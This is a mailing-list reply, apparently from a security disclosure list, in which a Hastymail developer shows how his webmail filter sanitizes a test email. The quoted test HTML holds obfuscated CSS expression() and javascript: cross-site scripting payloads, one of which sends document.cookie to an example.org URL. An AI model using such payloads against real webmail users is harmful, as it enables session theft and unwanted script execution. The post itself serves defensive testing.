Re: Webmails + Internet Explorer can create unwanted javascript execution

["Jason Munro" <jason () stdbev com>]

On October 2, 4:39 pm Jedi/Sector One <j () pureftpd org> wrote:

FWIW, Hastymail, (a lesser known webmail IMAP client written in PHP i'm
working on) does filter out this nastyness.

HTML before:
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
>                "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd";>
> <html xmlns="http://www.w3.org/1999/xhtml"; xml:lang="fr">
> <head>
>   <title>Webmail test</title>
>   <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"
> /> </head>
> <body style="width:&#x65;xpres\sion(alert(1))">
>   <style type="text/css">
> h1 {
>   he\ight:&#x65;\xpression(alert(2));
>   bac\kground-image:&#x65;\xpression('url(http://example.org/'+document.c
> ookie+$
> }
>   </style>
>   <h1 style="width:&#x65;xpression(alert(3))">...</h1>
>   <div id="just-for-fun">
>     <a href="&#x6A;avascript:window.open(document.location);"
>        onmouseover="alert(4)">fireworks</a>
>   </div>
> </body>
> </html>

HTML after:
<!-- begin sanitized html -->

  <h1 style="width:idiocy(alert(3))">...</h1>
  <div id="just-for-fun">
    <a>fireworks</a>
  </div>


<!-- end sanitized html -->

The default filter settings do not allow HTML hyperlinks, but this can be
adjusted by the user producing this output for the 'fireworks' link
instead:

<a href="blah:window.open(document.location);" target="_new">fireworks</a>

Hastymail uses the PHP HTML filter written by Konstantin Riabitsev found
here:

http://www.mricon.com/html/phpfilter.html

The filter paramaters are set very tightly to avoid this kind of issue.
While squirrelmail's filter is based on the same engine apparently either
it's not up to date or the params are not set as tight.

\_____ Jason Munro ________________________
 \_____ jason () stdbev com ___________________
  \_____ #hastymail at irc.freenode.net _____
   \_____ http://hastymail.sourceforge.net ___